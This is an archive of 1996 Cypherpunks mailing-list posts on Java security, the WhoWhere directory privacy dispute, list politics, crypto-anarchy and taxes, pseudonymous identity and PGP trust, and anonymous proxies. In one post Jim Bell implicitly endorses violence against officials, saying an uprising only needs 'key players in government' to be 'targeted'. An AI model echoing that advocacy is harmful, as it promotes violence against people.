     those that are most tolerable are arbitrary, cruel, 
     grasping and unintelligent."  
                                            -- H.L. Mencken
================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAgUBMYLyCdjIfSil0ckxAQGTJgQAyBHD7ZGTi/KTDeXaIfxW07c6xxsR2sLI
MjJ4jLx608/2bKtRkOw+PIzXZvj9NtTKdZ2elBDasszlgoK6l2Kb+NZS3jU1lYAS
ZT7E2LiYE5ShBIWlI04D6nnwIuFWnPMgLPcBgdtIQ7MWrKxnb2qEtuFL9lAxj2kI
UxNYSd0zQWw=
=PjTz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 28 Apr 1996 19:12:23 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: The Joy of Java
In-Reply-To: <199604280147.SAA20653@netcom20.netcom.com>
Message-ID: <199604280704.DAA06780@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Marianne Mueller writes:
> I guess you're opting for food fight? 
> 
> I'll let people who know me judge if they think I'm mouthing party line
> or what not ..

As I said, I don't think you are a bad person. I merely think that no
one could expect the Java security person to say anything other than
what you have said.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 23:09:29 +0800
To: "Who knows who's listening?" <cypherpunks@toad.com>
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.GUL.3.93.960427214213.9901G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.GUL.3.93.960428032656.9901M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I should have done some more research first before going off and whining.

It seems that at least two Stanford graduate students, one in business and
one in engineering, are involved with the project. I guess they thought,
"Look, the Yahoo guys just got millions of bucks. Let's do the same
thing." 

They will be receiving an excellent education in "knowing your target
audience" and "good design." Also "intellectual property," "public
relations," and a few other subjects.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 28 Apr 1996 23:43:59 +0800
To: <cypherpunks@toad.com>
Subject: [;)] v2.0
Message-ID: <v0300661eada902e273e5@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


<http://www.well.com/user/ddt/info/jet-reply.html>           (v2.0)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 00:26:43 +0800
To: Gunjan Sinha <gunjan@parsecweb.com>
Subject: Re: [WhoWhere?]
In-Reply-To: <Mailstrom.1.06.34473.-26472.morgan@networking.stanford.edu>
Message-ID: <Pine.GUL.3.93.960428042051.12519A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You wrote:

> We would like to bring to your attention the WhoWhere? search engine at
> URL: http://www.whowhere.com If you feel it is appropriate for the
> Stanford community, we would appreciate a link from your "campus
> directory"... 
> 
> WhoWhere? is an effort by a team from Stanford GSB and engineering school
> and we would appreciate your support of our efforts.
> 
> Please feel free to give us any feedback to enhance our service
> to build the largest white pages community.

Please unplug your server from the Internet immediately, and do not plug
it back in until all database entries based on other than publicly
available information have been scrubbed. Please refer any Stanford
affiliates involved with your project to the thread concerning your
activities in the su.computers newsgroup.

Thank you. Have a nice day.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 28 Apr 1996 19:40:09 +0800
To: hochiminh@alpha.c2.org
Subject: Re: code vs cypher
Message-ID: <199604280552.WAA20878@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from hochiminh@alpha.c2.org 04/26/96  8:31pm -0700 
  
= Perry E. Metzger" <perry@piermont.com> writes: 
=  
= pm> tm> Timothy C. May writes: 
= pm> tm>  Well, I was not invited to join the elite and secret  
= pm> tm>  coderpunks list, 
=
        well, apparently that was not a problem.
  
= pm> It is neither elite nor secret. It is fairly high signal to  
= pm> noise. 
= pm> I think only about one in every fifty or so cypherpunks 
= pm> messages has any content at all worth mentioning. 
=  
= Agreed!  I wasn't "invited".  I simply requested access and 
= was quickly welcomed to the list. 
=  
        yes, and that was the intent.

	I do not think the intent of those of us who formed 
   Coderpunks "conspired to form an elitest group."  The basic problem 
   was simple --even code topics were politicized in cypherpunks which 
   resulted in scores and days of "re: " messages until someone finally 
   prefaced it with [NOISE], or changed the subject.
 
= pm> tm> but I still have some thoughts on coding and,  
= pm> tm> especially, on the opportunities offered by Java.  
= pm> tm> Sorry if this interferes with discussions of Rabbi  
= pm> tm> Heir and Morris Dees. 
=  
= pm> You have no right to grumble about the situation here. 
= pm> It is exactly what you wanted. Here you were, a person 
= pm> of some personal gravitas and moral authority, and you  
= pm> put your stamp on the "post whatever you like; don't let  
= pm> the grumbling censors stop you". Well, as you sow, so 
= pm> shall you reap. Its your fault, more than anyone else's. 
=  
= TC May was not the first person to substantialy digress from 
= chartered topics but he certainly "ran with the ball" when he 
= got his chance to expose his ignorance and intolerance of 
= other races and religions (the cypher-relevance or "charter 
= topicality of which always escaped me).  I was discouraged 
= by the encouragement given to the murder advocating moron, 
= Jim Bell to post his insance littany. 
=  
        as to jim bell, does this imply you believe in censorship?

        I think you are mistaken with your implication that tcmay is a 
   racist. Bigotry, etc. is usually created in the mind of a reader who
   jumps to conclusions.  I am somewhat older than tim, and I find the
   politically correct revisionism even more humourous (and very
   intellectually cheap):  vertically challenged, horizontally
   challenged, mobility challenged, mentally challenged, or whatever    
   the current fads are.

        and, to top it off, I am disgusted with the high and mighty 
   moralism of the revisionists. I fully agree with EEO, but I 
   thoroughly disagree with quotas and preferences.  I have more than 
   an even tendency to call a spade a spade, and I may live where guns   
   tend to outnumber our many children, but the only way a stranger can 
   be bounced from my table is to interfer with grace --and there are 
   some, as they are attending for the extra plate which is always set, 
   who would protest that my prayer offends them. does anybody still 
   have manners?

        tim finds humour in many things --and, he has the courage to
   challenge the politically correct revisonism which is being shoved
   down our throats by a bigger and bigger, but certainly not better,
   creeping vine of vipers we call our government, which is nothing 
   more than a ship of fools.

= pm> If Cypherpunks has become a cesspit, well, its YOUR cesspit,  
= pm> Tim. Its the list you always strove to create, but it appears  
= pm> that you now don't like the smell of your own wallow. Well,  
= pm> sorry. Deal with it. 
=  
= Well put, Perry! 

        well, the premise may be correct on what cypherpunks drifts 
   into with the endless political back and forth --the open forum;  
   however, the creation of the cesspit is not one party's fault  --we 
   _all_ have contributed to the problem --which is compounded by 
   direct, on-line connections.

        so, how about a little moderation in all things?




--
Overseeing first-rate programmers is a managerial challenge roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gunjan Sinha <gunjan@parsecweb.com>
Date: Mon, 29 Apr 1996 02:28:01 +0800
To: llurch@networking.stanford.edu
Subject: Re: [WhoWhere?]
Message-ID: <199604281351.GAA16852@parsecweb.com>
MIME-Version: 1.0
Content-Type: text/plain


I am sorry if you misunderstood my previous email. We are ex-Stanford
grad, not current students! The WhoWhere? database is collected through
a combination of technolofy, partnerships, and self-registrations by
end-users.

Our content is from publicly available sources. We run crawlers for Newsgroups
and WWW to collect our content. Several Thousand individuals come to 
WhoWhere? to add theor listing every day. 

Hope I have been able to clarify your confusion.

Gunjan
WhoWhere? Inc.
> From llurch@networking.stanford.edu Sun Apr 28 04:54:21 1996
> Date: Sun, 28 Apr 1996 04:43:36 -0700 (PDT)
> From: Rich Graves <llurch@networking.stanford.edu>
> To: Gunjan Sinha <gunjan@parsecweb.com>
> cc: cypherpunks@toad.com
> Subject: Re: [WhoWhere?]
>
> You wrote:
>
> > We would like to bring to your attention the WhoWhere? search engine at
> > URL: http://www.whowhere.com If you feel it is appropriate for the
> > Stanford community, we would appreciate a link from your "campus
> > directory"... 
> > 
> > WhoWhere? is an effort by a team from Stanford GSB and engineering school
> > and we would appreciate your support of our efforts.
> > 
> > Please feel free to give us any feedback to enhance our service
> > to build the largest white pages community.
>
> Please unplug your server from the Internet immediately, and do not plug
> it back in until all database entries based on other than publicly
> available information have been scrubbed. Please refer any Stanford
> affiliates involved with your project to the thread concerning your
> activities in the su.computers newsgroup.
>
> Thank you. Have a nice day.
>
> -rich
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 29 Apr 1996 04:55:06 +0800
To: cypherpunks@toad.com
Subject: Book: The President's Eyes Only
Message-ID: <199604281408.HAA09274@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I just finished reading "For the President's Eyes Only", 
a book by Christopher Andrew.  It describes the uses 
that US presidents have made of intelligence and 
intelligence organizations, from George Washington to 
George Bush.  

What caught my eye first was a quotation by David Kahn 
that says: "This is the most important book ever 
written about American intelligence."

The cypherpunks relevance (Besides the David Kahn quote) is 
the frequent mention of NSA decrypts and SIGINT.  The frequency 
that nations and individuals have used (and apparently continue 
to use) breakable encryption is incredible.  The intelligence 
that has been derived by breaking them is worth a great deal, 
in dollars and maybe lives.  This book has made me understand a 
bit, why a government might try to limit strong cryptography.  

I suppose I tended to look upon ITAR restrictions on cryptography 
as a sign of a power-hungry, self-agrandizing, government that has 
lost track of the fact that its legitimacy depends on protecting 
the blessings of liberty for its citizens.  That's partly true, 
but there's more to it than that.  

After reading "For the President's Eyes Only", I can understand that 
many in government believe that they are protecting the public by 
outlawing cryptography.  After careful reconsideration, I still 
believe in strong free crypto, but it made me think very hard.
I think that some on this list and in sci.crypt should be ashamed of 
their ad hominem attacks in an area where reasonable people disagree. 

The crypto-game is being played "for keeps".  Someday, all crypto 
may be too strong to break, but for right now, many "bad guys" 
(and whatever your philosophy, I bet you can find some) use weak 
crypto, and this allows the US Govt. to know more about what goes 
on in the world.  As long as Uncle Sam keeps his finger on a nuclear 
trigger, I can see a strong case that knowing what he's doing and 
not getting too surprised are (mostly) good things.

There will be a price to pay when everyone uses strong crypto.  
There will be great benefits derived, as well.  It will be very 
expensive, but worth it.  If we want to make it happen sooner, 
we should understand (and respect) our opponents in this debate.

 
Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.segno.com
Date: Mon, 29 Apr 1996 01:20:05 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199604281221.AA01603@october.segno.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> Income tax is the Godzilla of taxes.  It is THE TAX when it comes
> to the US.  (Perhaps VAT has a similar status elsewhere, but both,
> as pointed out, are subject to crypto-anarchistic subversion.)
> 
> > ...taxes existed, and governments sustained themselves perfectly
> > well, long before these systems arose.
> 
> But at nowhere near the voracious levels of modern states.

This is a point I hadn't considered.  If the govt doesn't know where
most of the money is, they can't "harvest" it nearly as efficiently.
Although they will almost certainly try to extract as much as possible
from the poor, you can't get blood from a stone.  Hence the size of
current governments will undoubtedly have to shrink.

Most other arguments put forth so far in this thread, about how people
"won't stand for" certain government behaviors and so forth, I don't
find convincing.  Modern military technologies, especially in the
U.S., make the prospects of a sucessful popular uprising dubious.

When you cut off someone's air supply, even the nicest, gentlest
person will go into an unrestrained, murderous frenzy.  I expect
something similar will happen to even the most "civilized" governments
within the next few years, as popular crypto begins to cut off their
money supply.  As I see it, only those relatively few citizens who can
afford to flee will dare to resist.

Which brings us to the "flight of capital" issue.  Will nations be
able to compete freely for the loyalty of the rich?  Or will the most
powerful nations form effective coalitions, and perhaps simply bomb
"rogue" nations into the stone age?

The more I contemplate my "simple" question of yesterday, the more I
find myself getting into deep waters which I feel ill-equipped to
navigate.  I rapidly run up against such imponderable questions as,
"What is government?"  and "What is wealth, really?"  Only one thing
is certain: We live in interesting times!

At any rate, I thank everyone for their thoughtful responses.

					---  mkj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 29 Apr 1996 02:23:34 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Guardian angels, the decency brigade, and
In-Reply-To: <9604270337.AA22787@frumious-bandersnatch.MIT.EDU>
Message-ID: <ElUqZXC00YUvE1vu1P@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message begins here ----------

From: sethf@MIT.EDU
Date: Fri, 26 Apr 1996 23:37:48 -0400
Message-Id: <9604270337.AA22787@frumious-bandersnatch.MIT.EDU>
To: angels@wavenet.com
Subject: Re: Guardian angels, the decency brigade, and cyberseraphim
Cc: fight-censorship+@andrew.cmu.edu, mnemonic@well.com, cp@panix.com

	I have been researching the issue of ratings for some time, and
thinking of getting a SafeSurf rating for a few pages as an experiment,
so this "patrolling" is pretty interesting:

"Gabriel" writes:
> The answer is yes.  So how can Safesurf be sure that sites registered with
> them are indeed genuinely kidsafe?  Simple - someone has to go and check
> out all the sites who register with Safesurf.

	Now, would you be kind enough to tell me what happens next?
Suppose you check out a site and find it is in your opinion not
"kidsafe". What do you do in that case? This is not clear from your message. 
	If the essence of the the SafeSurf system is "voluntary" ratings,
are you not substituting your own standard? After all, in reference to
Declan McCullagh's point about the fight-censorship archives, you say:

"Why ask?  Clearly a site with a message like this would not be suitable for
children to read.  That would be an adult site rating."

	Clearly then, you have some standard you are applying, which
seems in this case be roughly "any archive which contains any message
with any sexual content, no matter what the context or proportion, does
not qualify as "kidsafe" in the CyberAngels view."
	So, in reality do we not have two standards here, the site's
"voluntary" one, and the one the CyberAngels apply to the site? Only if
the two coincide will all be well. Thus, is it not reasonable to ask
that the CyberAngels at least make clear their criteria? I collect items
such as this (ratings systems), I would be very interested in what the
CyberAngels have come up with.

================
Seth Finkelstein
sethf@mit.edu

P.S. I don't know if you're a recent recruit or not, but Curtis Sliwa
has a checkered history at best. Given the fabrications in the Angel's
past, what can we expect in their future?

References:

       AUTHOR: Goodstein, Laurie
        TITLE: Guardian Angels' Chief Clouds His Reputation
       SOURCE: Washington Post
   SEC,PG:COL: A, 3:1
         DATE: Nov 29, 1992
     ABSTRACT: Curtis Sliwa, founder of the Guardian Angels, has admitted 
               that some of his 1980s exploits were fabricated to get 
               publicity.

      AUTHOR: Gonzalez, David
        TITLE: Police Union to Sue Sliwa over Hoaxes
       SOURCE: New York Times
   SEC,PG:COL: B, 6:6
         DATE: Nov 26, 1992
     ABSTRACT: Ron Reale, the president of the New York City transit police 
               union, said Nov 25, 1992 that his group would file a lawsuit 
               against Curtis Sliwa, the founder of the Guardian Angels, on 
               the grounds that he had injured the union's reputation by
	       faking crime-fighting exploits in order to garner publicity 
               for the Guardian Angels.

       AUTHOR: Gonzalez, David
        TITLE: Sliwa Admits Faking Crimes for Publicity
       SOURCE: New York Times
   SEC,PG:COL: B, 1:4
         DATE: Nov 25, 1992
     ABSTRACT: The Guardian Angels' founder and leader, Curtis Sliwa, 
               admitted in a New York Post article on Nov 24, 1992 that he 
               faked six of the group's early crime-fighting exploits to
               gain publicity.  Some former and present associates contend 
               that even more of the group's activities were publicity 
               stunts.

        TITLE: Curtis Sliwa's Confession
       SOURCE: New York Times
   SEC,PG:COL: A, 32:1
         DATE: Nov 27, 1992
     ABSTRACT: An editorial wonders why so many New Yorkers got taken in by 
               Curtis Sliwa, the Guardian Angels' leader who recently 
               confessed that he and his Angels fabricated several exploits 
               in order to gain public support.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Bridgewater <bob@bridgew.demon.co.uk>
Date: Sun, 28 Apr 1996 21:42:27 +0800
To: cypherpunks@toad.com
Subject: Windows remailer source code
Message-ID: <3183259e.1339015@post.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Please could you tell me if you know of any remailer source code that will run under Windows NT3.51
to enable me to set-up a remailer myself. Somebody told me that one has been announced recently and
you may know where to find this.
Any suggestions would be welcome.

Bob Bridgewater
bob@bridgew.demon.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Mon, 29 Apr 1996 02:36:12 +0800
To: cypherpunks@toad.com
Subject: Keyserver at jpunix.com on WWW
Message-ID: <Pine.NEB.3.93.960428082815.6527A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just got through implementing and testing Brian LaMacchia's code
for WWW access to the PGP keyserver at jpunix.com. This means that the Web
page for jpunix.com can now perform interactive, realtime searches and
adds against the keyserver database. If you would like to try it, the URL
is:

http://www.jpunix.com/pks-toplev.html

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp2.0, a Pine/PGP interface.

iQCVAwUBMYN2llOTpEThrthvAQEyqwP5AT14+2NbvdXdEnr8nxaSUVcLUmA2M0+z
PDdOXidleU4P5BesHe0cIO0FdrpLC7EHi7mhg3XgwEeooCv2wGsOf59oGGikaqSl
4WLEvoQQOftVQNeE5vv7mbiYo4M5CZBm/QSu1QK3SD37ohT/pRy+RFu0ldRuxrAl
aPSro/koBN8=
=pFGr
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 29 Apr 1996 03:19:55 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.GUL.3.93.960427172022.9454F-100000@Networking.Stanford.EDU>
Message-ID: <199604281414.JAA14452@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Rich Graves wrote:
> They did that too. They got recursive whois and finger sweeps dated
> mid-1993 (we catch people doing whois aaaa*, aaab*, and so on every once
> in a while), a Usenet-wide sweep dated early 1994, a sweep of local,
> firewalled su.* newsgroups last December/January 95/96, and an outright
> theft of the master shadow password file for most stanford.edu accounts
> (address, real name, and UID only, no group ID or encrypted password) in
> January 1996.

Why people tolerate running "old" finger server on their machines?  Old
finger server giving anyone names of all users logged on, dynamic
information such as from where they are logging in, etc etc is just as
bad invasion of privacy as whowhere.com.

It does not take a genius to write a safer replacement for in.fingerd that
reports only what users wish to report about themselves. There are many
good replacements for finger daemon floating around, too.

I wrote one in perl, it is about 50 lines long and is free for asking.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Apr 1996 07:24:21 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <m0uDagf-00093GC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:21 AM 4/28/96 -0400, mkj@october.segno.com wrote:
>Sandy Sandfort wrote:
>> Income tax is the Godzilla of taxes.  It is THE TAX when it comes
>> to the US.  (Perhaps VAT has a similar status elsewhere, but both,
>> as pointed out, are subject to crypto-anarchistic subversion.)
>> 
>> > ...taxes existed, and governments sustained themselves perfectly
>> > well, long before these systems arose.
>> 
>> But at nowhere near the voracious levels of modern states.
>
>This is a point I hadn't considered.  If the govt doesn't know where
>most of the money is, they can't "harvest" it nearly as efficiently.
>Although they will almost certainly try to extract as much as possible
>from the poor, you can't get blood from a stone.  Hence the size of
>current governments will undoubtedly have to shrink.
>Most other arguments put forth so far in this thread, about how people
>"won't stand for" certain government behaviors and so forth, I don't
>find convincing.  Modern military technologies, especially in the
>U.S., make the prospects of a sucessful popular uprising dubious.

Then you obviously haven't read the essay (AP) I sent you yesterday.  
"Military technologies" only work effectively against a military target.  
Kill civilians and you just make other civilians angry.  At that point 
they'll be look for a weapon that "military technologies" cannot effectively 
oppose.  That weapon is already known to be possible.  

Quite the contrary, I think that a "successful popular uprising" will 
require only a very small investment in time and money, in which some of 
they key players in government are targeted and the prospect exists for 
easily and cheaply getting the rest.  At that point they will resign in droves.

>
>When you cut off someone's air supply, even the nicest, gentlest
>person will go into an unrestrained, murderous frenzy.  I expect
>something similar will happen to even the most "civilized" governments
>within the next few years, as popular crypto begins to cut off their
>money supply.  As I see it, only those relatively few citizens who can
>afford to flee will dare to resist.

Please read the essay.  I think it may enlighten you.  

Even with "conventional" analysis, there is no reason to believe that 
governement will be able to avoid shrinking.  Aside from making it easier to 
avoid taxation, the vast increase in information communicated by the 
Internet is taking a huge amount of power away from the traditional media, 
and the media is (despite the illusion they want you to believe!) the main 
backer of the government in most cases.  In addition, this information flow 
is making it ever more difficult to pass abusive laws; if the government 
does something stupid in the morning, by noon they are being flooded with 
faxes and emails.  And the whole concept of having a "governement" tends to 
be based on the assumption that people are incapable of making decisions for 
themselves.  That's an increasingly unrealistic position.

Government feeds on its own size; once government is dramatically reduced 
below its current size, it will become even less able to resist further 
contraction.  Probably few government employees realize this.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 08:45:45 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Proving that you're not a nym [was Re: Mindshare and Java]
In-Reply-To: <Pine.SUN.3.91.960428123816.8031A-100000@rwd.goucher.edu>
Message-ID: <Pine.GUL.3.93.960428114931.13032D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Moltar Ramone wrote:

> > 4. If I'm not Jack the Ripper, I can say "That wasn't me."
> 
> Aaaah... you can say it, but there's no way to prove it...
> 
> anyone can still be anyone without persistent ID of some sort.
> 
> some people would want this to be your True Name.
> 
> (I'm not agreeing with this... but you can't prove you're _not_ a Nym.
> Jim Bell has claimed (well, implied that he believes, although he hasn't
> outright claimed) that I'm L.D. and/or Black Unicorn.
> 
> There's no way I can prove I'm not one of them without demonstrating who
> they are. Which I can't do just by signing Java code...

Yes, of course there's the caveat "without demonstrating who they are."
I am stupid, but not THAT stupid.

Though on second thought... you can, through the web of trust. If a
mutually trusted signator who has signed keys for both A and B solemnly
swears that they are different people, then that should be sufficent proof
for me. I am under no illusion that PGP signatures are exclusive as to
identity, but if a mutually trusted signator made such a statement in
addition to signing the keys, I would accept it.

In this specific case, no, there is nothing you can do to prove that
you're not the Unicorn of Color, because there are no signatures on his or
her key.

In addition, in some sense, the different nyms of one person ARE different
people. They can certainly have different reputations. A signature from
0xCCE7B49D, rich@c2.org, means something different than a signature from
0x189D1595, win-request@metrics.com, the moderator of
comp.os.ms-windows.announce, which at the moment is me.

If I get code signed by "Bill Gates, speaking for Microsoft," I may treat
it differently than code signed by "Bill Gates, not speaking for his
employer."

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 29 Apr 1996 06:50:31 +0800
To: bryce@digicash.com
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <199604281556.RAA11900@digicash.com>
Message-ID: <960428.121408.2z7.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, bryce@digicash.com writes:

> Unfortunately I can't see anyway to gain trust in this
> pseudonym since I don't believe that the ostensible owner,
> name of "Black Unicorn", understands about how to establish
> a strong pseudonym in the Web O Trust.

[12:09] 1 [c:\grab]:sendai# pgp -kvv unicorn@schloss.li
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1996/04/28 17:10 GMT

Key ring: 'c:\glyph\pubring.pgp', looking for user ID "unicorn@schloss.li".
Type bits/keyID    Date       User ID
pub  2048/4E685D39 1995/03/26 Black Unicorn <unicorn@schloss.li>
sig       5AC7B865             (Unknown signator, can't be checked)
sig       DCB75233             Sandy Sandfort <SSANDFORT@ATTMAIL.COM>
sig       4E685D39             Black Unicorn <unicorn@schloss.li>
1 matching key found.

Looks like a good start to me.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYOnwBvikii9febJAQHafQP9HY9bjBIBqlPg9NT+/K6kpcYwvJkJGhrF
NYqwwYPSJqHwCVs+BPnPrdvjPR/rkSqyBeKx2QNOF84HpZmAXn/URQ064DRI0Gug
w7VlotuuGfa8HMS/MQwOMDEu42jQJuDpQsibwkWeCvy8IZrgpjsyl86w2lKd1Gjf
GymvDoJ7j7U=
=DYms
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 29 Apr 1996 05:05:41 +0800
To: cypherpunks@toad.com
Subject: Re: WWW Proxies?
Message-ID: <Pine.LNX.3.93.960428123832.212A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 27 Apr 1996, Ryan Russell/SYBASE wrote:

> We use CERN proxies, as well as general purpose proxies,
>  which effectivly narrows it down to someone within my company.
> 
> But, that only masks the IP address.  My impression was that
> most browsers hand out enough info about you at the application
> layer that it does little good to mask the IP address.  At least for
> privacy purposes...address translation is a great firewall
> model, IMHO.

There are anonymous web proxies that remove the headers sent with the HTTP
request.  This way, it is impossible to track down the user without doing
some sort of active monitoring of connections to the proxy.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMYLrg7Zc+sv5siulAQH2OQP9EeKgA0L8ApKBd6D0EsgrsisgldIim7nY
GFAPDZqde7wXI09Am5mSTcUOlGYojXiV6lxxB/UZ/Dq/7Q2ZaahhF+gPefnRKLtb
VmHMK2mkkJB76OhUvMDC69FYg5IoZTe2yBhnYpaglu1oqK1DVSNMJTKKt27KPsWj
lGCoDjdIKg8=
=zk1P
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Mon, 29 Apr 1996 05:44:44 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.GUL.3.93.960427162243.9454C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960428123816.8031A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Rich Graves wrote:

> Some of the things a valid signature from Jack the Ripper means: 
[ ... ]
> 4. If I'm not Jack the Ripper, I can say "That wasn't me."

Aaaah... you can say it, but there's no way to prove it...

anyone can still be anyone without persistent ID of some sort.

some people would want this to be your True Name.

(I'm not agreeing with this... but you can't prove you're _not_ a Nym.  
Jim Bell has claimed (well, implied that he believes, although he hasn't 
outright claimed) that I'm L.D. and/or Black Unicorn.

There's no way I can prove I'm not one of them without demonstrating who 
they are. Which I can't do just by signing Java code...

Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Apr 1996 11:45:21 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Re: Mindshare and Java
Message-ID: <m0uDdSn-000943C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 PM 4/28/96 -0400, Moltar Ramone wrote:

>(I'm not agreeing with this... but you can't prove you're _not_ a Nym.  
>Jim Bell has claimed (well, implied that he believes, although he hasn't 
>outright claimed) that I'm L.D. and/or Black Unicorn.

I don't recall ever implying this...  Could you be more specific?  I've 
noticed a bit of coordination, but is there any more than this?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 29 Apr 1996 10:49:59 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199604282111.OAA25859@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:21 AM 4/28/96 -0400, mkj@october.segno.com wrote:
>  Modern military technologies, especially in the
> U.S., make the prospects of a sucessful popular uprising dubious.

By this argument the Soviet Empire could never fall.

Governments are rarely overthrown.  Rather, they collapse.

Governments continually struggle to maintain cohesion. 

Sometimes they fail.  They do not naturally have cohesion.  
A government is not naturally a single thing, not an 
entity by nature, the way a person is an entity by nature.

> When you cut off someone's air supply, even the nicest, gentlest
> person will go into an unrestrained, murderous frenzy.  I expect
> something similar will happen to even the most "civilized" governments
